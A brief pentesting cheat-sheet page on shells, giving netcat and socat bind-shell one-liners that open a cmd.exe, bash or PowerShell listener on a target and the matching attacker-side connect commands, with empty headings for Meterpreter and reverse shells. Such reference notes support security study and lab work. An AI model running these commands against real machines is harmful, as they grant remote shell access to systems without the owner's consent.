Exploitation/ShellsBind ShellsSetting up a listener on the victim machine for the attacker to connect toNetcat On the target: nc -lvnp <port> -e "cmd.exe" On the attacking machine: $ nc MACHINE_IP <port> Socat On a Linux target: socat TCP-L:<PORT> EXEC:"bash -li" On a Windows target: socat TCP-L:<PORT> EXEC:powershell.exe,pipes On the attacking machine: socat TCP:<TARGET-IP>:<TARGET-PORT> -MeterpreterA list of commonly used meterpreter commandsReverse ShellsCommonly used reverse shells